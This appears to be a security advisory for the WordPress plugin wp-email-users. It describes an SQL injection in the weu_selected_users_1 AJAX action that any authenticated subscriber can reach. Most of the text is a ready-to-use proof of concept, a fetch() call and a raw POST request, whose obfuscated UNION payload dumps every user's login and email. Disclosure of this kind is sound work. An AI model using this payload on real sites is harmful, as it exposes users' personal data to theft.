The plugin does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.
As any authenticated user (such as subscriber), the request below will display all users email addresses fetch(“httsp://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“weu_selected_users_1”,“data_raw[]”:“0 UNION SELECT concat(char(97),char(58),char(49),char(58),char(123),char(105),char(58),char(48),char(59),char(115),char(58),char(54),char(57),char(58),char(34),char(49),char(32),char(85),char(78),char(73),char(79),char(78),char(32),char(83),char(69),char(76),char(69),char(67),char(84),char(32),char(99),char(111),char(110),char(99),char(97),char(116),char(40),char(117),char(115),char(101),char(114),char(95),char(108),char(111),char(103),char(105),char(110),char(44),char(32),char(99),char(104),char(97),char(114),char(40),char(52),char(52),char(41),char(44),char(32),char(117),char(115),char(101),char(114),char(95),char(101),char(109),char(97),char(105),char(108),char(41),char(32),char(70),char(82),char(79),char(77),char(32),char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115),char(34),char(59),char(125))”}), “method”: “POST”, “credentials”: “include” }) .then(response => response.text()) .then(data => console.log(data)); POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/x-www-form-urlencoded Content-Length: 1405 Connection: close Cookie: [any authenticated user] action=weu_selected_users_1&data;_raw%5B%5D=0+UNION+SELECT+concat%28char%2897%29%2Cchar%2858%29%2Cchar%2849%29%2Cchar%2858%29%2Cchar%28123%29%2Cchar%28105%29%2Cchar%2858%29%2Cchar%2848%29%2Cchar%2859%29%2Cchar%28115%29%2Cchar%2858%29%2Cchar%2854%29%2Cchar%2857%29%2Cchar%2858%29%2Cchar%2834%29%2Cchar%2849%29%2Cchar%2832%29%2Cchar%2885%29%2Cchar%2878%29%2Cchar%2873%29%2Cchar%2879%29%2Cchar%2878%29%2Cchar%2832%29%2Cchar%2883%29%2Cchar%2869%29%2Cchar%2876%29%2Cchar%2869%29%2Cchar%2867%29%2Cchar%2884%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28111%29%2Cchar%28110%29%2Cchar%2899%29%2Cchar%2897%29%2Cchar%28116%29%2Cchar%2840%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28108%29%2Cchar%28111%29%2Cchar%28103%29%2Cchar%28105%29%2Cchar%28110%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28104%29%2Cchar%2897%29%2Cchar%28114%29%2Cchar%2840%29%2Cchar%2852%29%2Cchar%2852%29%2Cchar%2841%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28101%29%2Cchar%28109%29%2Cchar%2897%29%2Cchar%28105%29%2Cchar%28108%29%2Cchar%2841%29%2Cchar%2832%29%2Cchar%2870%29%2Cchar%2882%29%2Cchar%2879%29%2Cchar%2877%29%2Cchar%2832%29%2Cchar%28119%29%2Cchar%28112%29%2Cchar%2895%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%28115%29%2Cchar%2834%29%2Cchar%2859%29%2Cchar%28125%29%29
CPE | Name | Operator | Version |
---|---|---|---|
wp-email-users | eq | * |